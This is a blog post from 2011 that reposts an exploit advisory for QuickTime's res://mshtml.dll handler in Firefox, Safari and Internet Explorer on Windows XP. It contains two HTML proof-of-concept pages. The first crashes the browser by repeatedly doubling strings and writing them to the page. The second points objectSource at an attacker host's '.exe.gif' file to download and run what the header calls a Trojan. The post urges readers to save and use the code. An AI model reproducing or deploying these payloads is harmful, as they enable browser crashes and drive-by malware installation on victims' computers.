Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# Author : Tringle2011
# E-mail : andrew.nile@gmail.com
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on : Windows XP SP3 (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.
-->
#=======[ PoC (1) Buffer Overflow & Crash !]============>
<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
function boom()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
for(i=0; i <= 999 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>
#=======[ PoC (2) Download/Exec File]============>
<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>
# Save Any HTML Code and Use him (Boom !! :D)
This Blog is for intellectual computer persons. Who not only like computing but feel proud to be a computer maniac. More over this is the place for hackers and Programmers. We Shall Over Come !!!!!
Post Your Wish
Friday, May 27, 2011
Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment